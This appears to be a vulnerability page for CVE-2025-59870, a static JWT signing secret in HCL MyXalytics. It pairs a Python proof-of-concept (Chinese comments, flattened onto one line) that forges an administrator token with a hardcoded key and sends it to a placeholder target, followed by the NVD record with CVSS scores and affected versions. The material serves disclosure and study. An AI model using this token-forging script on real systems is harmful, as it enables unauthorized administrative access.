CVE-2025-59870

import jwt import requests # 获取到的硬编码JWT签名密钥（需要实际获取） JWT_SECRET = "hardcoded_secret_key_here" TARGET_URL = "https://target.com/api/endpoint" # 原始JWT令牌（从合法用户处获取或截获） stolen_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." # 解码原始令牌查看结构 decoded = jwt.decode(stolen_token, options={"verify_signature": False}) print(f"Original payload: {decoded}") # 伪造管理员令牌 fake_payload = { "sub": "admin", "role": "administrator", "user_id": 1, "exp": 1737158400, "iat": 1737072000 } # 使用硬编码密钥签名 fake_token = jwt.encode(fake_payload, JWT_SECRET, algorithm="HS256") print(f"Forged token: {fake_token}") # 发送伪造令牌尝试访问 headers = {"Authorization": f"Bearer {fake_token}"} response = requests.get(TARGET_URL, headers=headers) print(f"Status: {response.status_code}") print(f"Response: {response.text}")

{"cve": {"id": "CVE-2025-59870", "sourceIdentifier": "[email protected]", "published": "2026-01-16T11:16:02.660", "lastModified": "2026-01-23T17:05:07.123", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL MyXalytics  is affected by improper management of a static JWT signing secret in the web application, where the secret lacks rotation , introducing a security risk"}, {"lang": "es", "value": "HCL MyXalytics se ve afectado por la gestión inadecuada de un secreto de firma JWT estático en la aplicación web, donde el secreto carece de rotación, introduciendo un riesgo de seguridad."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-323"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:myxalytics:6.2:*:*:*:*:*:*:*", "matchCriteriaId": "0C6F2615-0B25-4465-BE38-714313C9062F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:myxalytics:6.3:*:*:*:*:*:*:*", "matchCriteriaId": "79D5EDA2-6774-4B8A-A3AC-659FFC139B5F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:myxalytics:6.4:*:*:*:*:*:*:*", "matchCriteriaId": "8533B38F-22F2-4D0E-8276-6B8F86D826C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:myxalytics:6.5:*:*:*:*:*:*:*", "matchCriteriaId": "0774CC44-C753-433F-85C3-9934FEE6BC1F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:myxalytics:6.6:*:*:*:*:*:*:*", "matchCriteriaId": "20B1E85F-A207-4692-A491-8DAE3D00654F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:myxalytics:6.7:*:*:*:*:*:*:*", "matchCriteriaId": "2858C304-AFAB-4ECA-96F0-C90A97F7A2DC"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128115", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}